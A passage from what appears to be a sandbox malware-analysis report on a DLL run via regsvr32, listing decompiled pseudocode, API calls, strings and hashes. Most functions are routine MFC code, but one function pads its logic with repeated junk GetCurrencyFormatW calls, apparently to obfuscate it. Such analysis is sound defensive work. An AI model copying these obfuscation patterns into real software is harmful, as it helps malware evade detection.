				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10046ad4; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E10004E6E(0, _t12, _t15, _t16, _t20);
					}
					 *0x10046ac4 = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10046ac8 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10046acc = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10046ac4; // 0x0
					 *0x10046ad0 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10046ac8; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10046acc; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10046ac8; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10046acc; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10046ad4 = 1;
				}
				return _t18;
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,10006175,000000FF), ref: 100056FB
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10005719
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10005726
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10005733
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10005740

Strings

ReleaseActCtx, xrefs: 1000571B
KERNEL32, xrefs: 100056F6
DeactivateActCtx, xrefs: 10005735
CreateActCtxA, xrefs: 10005713
ActivateActCtx, xrefs: 10005728

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 399c8412fe992e4a50a3ddfc252fd3a3d78dcfedf62abfe816ac053d2fec79fd
Instruction ID: 1d76d1e4db1a962794084fd329e7408aae32bd70e769f2b2ddda66e1b27d4fc6
Opcode Fuzzy Hash: 399c8412fe992e4a50a3ddfc252fd3a3d78dcfedf62abfe816ac053d2fec79fd
Instruction Fuzzy Hash: B51188B5809666DEF701EF65DEC040B7AE4E70A682705902FE108E2564E73218589F0B

Uniqueness

Uniqueness Score: -1.00%

Function 100080BA Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E100080BA(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E1001FBF7(E10033165, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000EC09(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1000EC09(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E10007BF2(_t84, _t100, __eflags);
					E1000A998(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E10005CAE();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E1000EFB3(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E1000EFCE(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E1000C3CA(_t96, __eflags, _t100);
					_t58 = E1000A8F0(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E10007ECA(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E1000EEC4(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E1000A486(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1000F1A1(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E1000EFCE(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E10007C2C(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E1001FC9C(_t63);
				}
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 100080C1
FindResourceA.KERNEL32(?,?,00000005), ref: 100080F4
LoadResource.KERNEL32(?,00000000), ref: 100080FC
LockResource.KERNEL32(?,00000024,100011BE,00000000,00000120), ref: 1000810D
GetDesktopWindow.USER32 ref: 10008140
IsWindowEnabled.USER32(?), ref: 1000814E
EnableWindow.USER32(?,00000000), ref: 1000815D

Part of subcall function 1000EFB3: IsWindowEnabled.USER32(?), ref: 1000EFBC

Part of subcall function 1000EFCE: EnableWindow.USER32(?,000000FF), ref: 1000EFDB

EnableWindow.USER32(?,00000001), ref: 10008239
GetActiveWindow.USER32 ref: 10008244
SetActiveWindow.USER32(?,?,00000024,100011BE,00000000,00000120), ref: 10008252
FreeResource.KERNEL32(?,?,00000024,100011BE,00000000,00000120), ref: 1000826E

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: af41f4a29e55a80224d8f74d86220bf91cb66e9945eb366eb3219191cba3f32d
Instruction ID: 62cfd41f18e3cc2e1163053c16dc1e50d79b68c3982d3d37ae726430dd99fe76
Opcode Fuzzy Hash: af41f4a29e55a80224d8f74d86220bf91cb66e9945eb366eb3219191cba3f32d
Instruction Fuzzy Hash: BD517D34A007459FFB11DFA4CC85AAEBAB5FF48781F204029E582B61A6CB755A42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C033 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000C033(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E1001FBF7(E10033663, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000A8F0(1, _t60, _t71,  *(_t71 + 0x14));
					E1000BF47(_t60, E1000A8F0(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E1000BFBD(1, _t66, E1000A8F0(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000963A(E1000A8F0(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E1000AEC5(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E1001FC9C( *(_t71 - 0x14));
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1000C03A
GetPropA.USER32 ref: 1000C049
CallWindowProcA.USER32 ref: 1000C0A3

Part of subcall function 1000AEC5: GetWindowRect.USER32 ref: 1000AEED
Part of subcall function 1000AEC5: GetWindow.USER32(?,00000004), ref: 1000AF0A

SetWindowLongA.USER32 ref: 1000C0CA
RemovePropA.USER32 ref: 1000C0D2
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1000C0D9
GlobalDeleteAtom.KERNEL32(00000000), ref: 1000C0E0

Part of subcall function 1000963A: GetWindowRect.USER32 ref: 10009646

CallWindowProcA.USER32 ref: 1000C134

Strings

AfxOldWndProc423, xrefs: 1000C042, 1000C047, 1000C0D0, 1000C0D8

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 2b9a5534c446d1e2504235bdd7f96beab8017efbdf1b97bda0119f086f5d1bd4
Instruction ID: dfbf0fdf7da19c16620821b7241651b8befac12ff30b1409a2a82cb4b6d679a3
Opcode Fuzzy Hash: 2b9a5534c446d1e2504235bdd7f96beab8017efbdf1b97bda0119f086f5d1bd4
Instruction Fuzzy Hash: 4F31983680021ABFEB02DFA4CD89DFF7A78EF09391F004124F501A5156DB749A51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007ECA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E10007ECA(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E1001FBF7(E1003314A, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1000EC09(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1000EC09(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E1000D1F4(_t103, _t104, 0, _t129, _t136, 0x10);
				E1000D1F4(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E1001FC9C(_t65);
					}
					E1000424F(_t132 - 0x1c, E1001044F());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E100123E2(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x1004866c; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E1000C3CA(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E10007926, 0);
							E10001260( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E1000A998(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E100123AB(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E10012309(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E10012022(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E10012014(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E10007EA2(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 10007ED1
GetSystemMetrics.USER32 ref: 10007F82
GlobalLock.KERNEL32 ref: 10007FEB
CreateDialogIndirectParamA.USER32(?,?,?,Function_00007926,00000000), ref: 1000801A

Strings

MS Shell Dlg, xrefs: 10007F8C

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: d36f1cedee4abc0f17e012704f78876727180ce03ae2431f8fa6d70f3892889f
Instruction ID: 1ea4d1b8922e6c5543e762249093f9d57ee88d3b172a0da63e9484b16312698d
Opcode Fuzzy Hash: d36f1cedee4abc0f17e012704f78876727180ce03ae2431f8fa6d70f3892889f
Instruction Fuzzy Hash: AF51DD30D0020A9FEB11DBA4CC859EEBBB0FF44380F214568F545EB19ADB349E85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001534 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001534(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _t22;
				signed int _t45;
				void* _t50;
				void* _t51;
				intOrPtr _t55;
				intOrPtr* _t64;
				void* _t73;

				_t51 = __ecx;
				_t45 = _a16 * _a20;
				_t22 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				_t55 = _a4;
				_a16 = E100014F4(_t51) + _t22 * (_t45 - _a12 + _t55 + _a8) *  *0x100440d4 * 0x34;
				_a12 = _t55 - _t45 - _a12 + _a8;
				_t73 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440cc * 0x24 +  *((intOrPtr*)(_a16 + 0xc));
				_t50 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440e0 +  *((intOrPtr*)(_t73 + 0xc));
				_t64 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a12 *  *0x100440d4 * 0x48 +  *((intOrPtr*)(_t73 + 0xc));
				while(E10001395( *((intOrPtr*)(_t64 + 0x30)) + GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 2, _a24) != 0) {
					_t64 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 0x48 +  *_t64;
					if(_t64 != _t50) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t64 + 0x18));
			}

0x10001534
0x10001539
0x1000155f
0x10001561
0x10001598
0x100015a9
0x100015cc
0x100015ef
0x10001619
0x1000161c
0x10001676
0x1000167a
0x00000000
0x00000000
0x00000000
0x1000167c
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 1000155F

Part of subcall function 100014F4: GetCurrencyFormatW.KERNEL32 ref: 10001512

GetCurrencyFormatW.KERNEL32 ref: 100015B5
GetCurrencyFormatW.KERNEL32 ref: 100015DF
GetCurrencyFormatW.KERNEL32 ref: 10001606
GetCurrencyFormatW.KERNEL32 ref: 10001639
GetCurrencyFormatW.KERNEL32 ref: 10001668

Strings

xadqsavcbdfewescGADW, xrefs: 1000153E, 1000154C, 10001593, 100015D0, 100015F7, 1000162A, 10001659
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001534, 10001553, 100015A4, 100015D7, 100015FE, 10001631, 10001660

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 5189b181ffaafe6b9c05ca24a10a3e20f9d538d3ca2e5d5b4c785eae2a339ca0
Instruction ID: 4961d4481171c5eb7b22e17488040c19a8d80f5034832b3bd1fa6cad81c8b5c3
Opcode Fuzzy Hash: 5189b181ffaafe6b9c05ca24a10a3e20f9d538d3ca2e5d5b4c785eae2a339ca0
Instruction Fuzzy Hash: 52319D73644215BFE204CB55CD82F86FBA9EB9A751F06401AF704BF5D1CB30A8548EA8

Uniqueness

Uniqueness Score: -1.00%

Function 10004C30 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10004C30(void* __edx, void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t38;
				void* _t43;
				void* _t51;
				void* _t52;
				void* _t53;
				long* _t54;
				void* _t58;
				CHAR* _t63;
				signed int _t64;
				void* _t66;

				_t66 = __eflags;
				_t51 = __edx;
				_push(0xffffffff);
				_push(E10032E77);
				_push( *[fs:0x0]);
				_push(_t43);
				_push(_t38);
				_push(_t52);
				_t19 =  *0x10045580; // 0x771f5646
				_push(_t19 ^ _t64);
				 *[fs:0x0] = _t64 + 0x18;
				_t58 = _t43;
				E10007D6C(_t38, _t43, _t52);
				_push(GetSystemMenu( *(_t58 + 0x20), 0));
				_t53 = E1000ED5E(0, _t43, _t52, _t58, _t66);
				if(_t53 != 0) {
					E1000424F(_t64 + 0x18, E1001044F());
					 *((intOrPtr*)(_t64 + 0x24)) = 0;
					E10004C10(_t64 + 0x18, 0x65);
					_t63 =  *(_t64 + 0x14);
					if( *((intOrPtr*)(_t63 - 0xc)) != 0) {
						AppendMenuA( *(_t53 + 4), 0x800, 0, 0);
						AppendMenuA( *(_t53 + 4), 0, 0x10, _t63);
					}
					 *(_t64 + 0x20) =  *(_t64 + 0x20) | 0xffffffff;
					E10001260(_t63 - 0x10, _t51);
				}
				_t54 = _t58 + 0x11c;
				SendMessageA( *(_t58 + 0x20), 0x80, 1,  *_t54);
				SendMessageA( *(_t58 + 0x20), 0x80, 0,  *_t54);
				E1000EE6D(_t58, 0x3e9, "Hola Mundo");
				E1000EE6D(_t58, 0x3ea, "Hola Mundo");
				SendMessageA( *(_t58 + 0xe8), 0x143, 0, "Hola");
				 *[fs:0x0] =  *((intOrPtr*)(_t64 + 0x18));
				return 1;
			}

APIs

GetSystemMenu.USER32(?,00000000,771F5646,?,?,?,?,?,?,10032E77,000000FF), ref: 10004C62
AppendMenuA.USER32 ref: 10004CAB
AppendMenuA.USER32 ref: 10004CB5
SendMessageA.USER32 ref: 10004CDD
SendMessageA.USER32 ref: 10004CE7
SendMessageA.USER32 ref: 10004D1A

Strings

Hola, xrefs: 10004D08
Hola Mundo, xrefs: 10004CE9, 10004CEE, 10004CFB

Memory Dump Source

